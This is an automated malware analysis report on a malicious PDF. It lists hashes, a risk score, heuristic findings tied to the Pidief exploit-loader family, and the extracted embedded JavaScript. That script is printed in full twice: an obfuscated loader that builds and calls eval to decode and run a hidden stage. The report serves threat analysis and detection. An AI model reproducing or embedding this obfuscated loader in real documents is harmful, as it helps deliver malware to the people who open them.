PDF malware analysis — malicious · 2e34ece96dbae542

MALICIOUS

PDF

44.7 KB First seen: 2026-05-09

MD5: b32293531933481da5d98a557f4b1d51 SHA-1: cc8feb7625f2a98c2b618b637025b863818f1911 SHA-256: 2e34ece96dbae54216357fee63b2e1bb3c5ec2050712a1ac8a048f46562dfd7a

86 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File: User Execution: Malicious File

The ML classifier strongly indicates maliciousness, and the presence of embedded JavaScript within the PDF is a common delivery mechanism for exploits or malware. The JavaScript stream, though not fully detailed here, is the primary indicator of malicious behavior. The file's SHA256 hash is included as a primary IOC.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xB062 451 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xB062	451 bytes
SHA-256: `0d09809769916758daba12ccec5192f01a57a1bbb163a0006073f26121f679de`
Preview script First 1,000 lines of the extracted script qwe = ('nhsthn','ntrht').substr; var g = qwe(); t='le'; a=["e","a","n","b","w",'v']; e=g[a[0]+a[5]+a[1]+t[0]]; jszdk=''; abz=('qwrwqr','tit'); e('osxok=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t); far=e('String.fr'+osxok.substr(0,10)); fowg = e(osxok.substr(10)['replace'](/u/g,',')); e('k=fowg.length'); for (i = 0; i < k; i+=2) { lvlxi = fowg[i+1] + ('erybjkerl',fowg[i]); jszdk += far(lvlxi); } e(jszdk);

SHA-256: 0d09809769916758daba12ccec5192f01a57a1bbb163a0006073f26121f679de

Preview script

First 1,000 lines of the extracted script

qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
jszdk='';
abz=('qwrwqr','tit');
e('osxok=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
far=e('String.fr'+osxok.substr(0,10));
fowg = e(osxok.substr(10)['replace'](/u/g,','));
e('k=fowg.length');
for (i = 0; i < k; i+=2) {
	lvlxi = fowg[i+1] + ('erybjkerl',fowg[i]);
	jszdk += far(lvlxi);
}
e(jszdk);

Open this report in the interactive analyzer, or submit your own file for analysis.